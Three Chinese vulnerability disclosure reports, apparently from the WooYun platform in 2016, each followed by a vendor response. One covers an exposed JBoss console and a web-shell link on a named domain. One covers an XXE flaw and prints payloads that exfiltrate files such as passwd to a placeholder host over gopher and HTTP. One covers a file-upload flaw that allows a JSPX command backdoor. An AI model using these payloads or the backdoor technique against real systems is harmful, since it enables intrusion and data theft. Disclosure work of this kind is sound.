漏洞详情披露状态： 2016-06-20： 细节已通知厂商并且等待厂商处理中2016-06-20： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-24： 厂商已经主动忽略漏洞，细节向公众公开简要描述：深处内网/未深入详细说明：http://www13.chinacache.com:9000/jmx-console/ 漏洞证明： shell证明地址请删除：http://www13.chinacache.com:9000/is/index.jspmask 区域1.http://**.**.**/is/index.jsp  修复方案：@@版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-24 15:06厂商回复：我们仔细进行了排查，发现并非蓝汛IP，应该是IP已被电信回收，只是对应域名未回收，导致域名解析到别的单位，对应域名记录信息我方已修改，等待生效即可，请乌云撤销此漏洞与蓝汛的对应关系，并继续寻找该服务器所属单位，谢谢。漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-10： 厂商已经确认，细节仅向厂商公开2016-05-20： 细节向核心白帽子及相关领域专家公开2016-05-30： 细节向普通白帽子公开2016-06-09： 细节向实习白帽子公开2016-06-24： 细节向公众公开简要描述：由于未禁用外部实体解析，导致XXE。详细说明：测试地址：http://**.**.**.**/问题点在这个地方：http://**.**.**.**/webservice/services/webservice?wsdl漏洞证明：构造：code 区域<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "test">%remote;]>获取系统目录：根据返回可以看到当前定义的文件参数实体被引用了。远程xml：code 区域<!ENTITY % a SYSTEM "file:///"> <!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://ip:80/%a;'>"> %b; %c;注入：code 区域<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ip:80/1.xml">%remote;]><root/>成功获取了根目录文件：passwd文件： 修复方案：禁用外部xml实体解析。版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-05-10 14:44厂商回复：CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.最新状态：暂无

漏洞详情披露状态： 2016-05-07： 细节已通知厂商并且等待厂商处理中2016-05-11： 厂商已经确认，细节仅向厂商公开2016-05-21： 细节向核心白帽子及相关领域专家公开2016-05-31： 细节向普通白帽子公开2016-06-10： 细节向实习白帽子公开2016-06-25： 细节向公众公开简要描述：国元信托oa系统任意文件上传导致getshell详细说明：国元信托oa系统上传功能http://**.**.**.**：7001/defaultroot/UploadServlet上传文件保存存在缺陷可通过构造恶意输入上传jspx后门。上传输入： path参数 及 fileId参数可自定义文件及目录名。上传类型修改为jspx可执行，jsp格式也可上传但执行会进行权限验证。上传post包，post数据包为自写简单后门文件上传路径：http://**.**.**.**:7001/defaultroot/upload/test/123459/1234592.jspx?cmd=dir执行结果： 漏洞证明：post数据包执行结果： 修复方案：禁止jspx执行；禁用path及fileId参数操纵上传文件命名。版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：11确认时间：2016-05-11 14:46厂商回复：CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.最新状态：暂无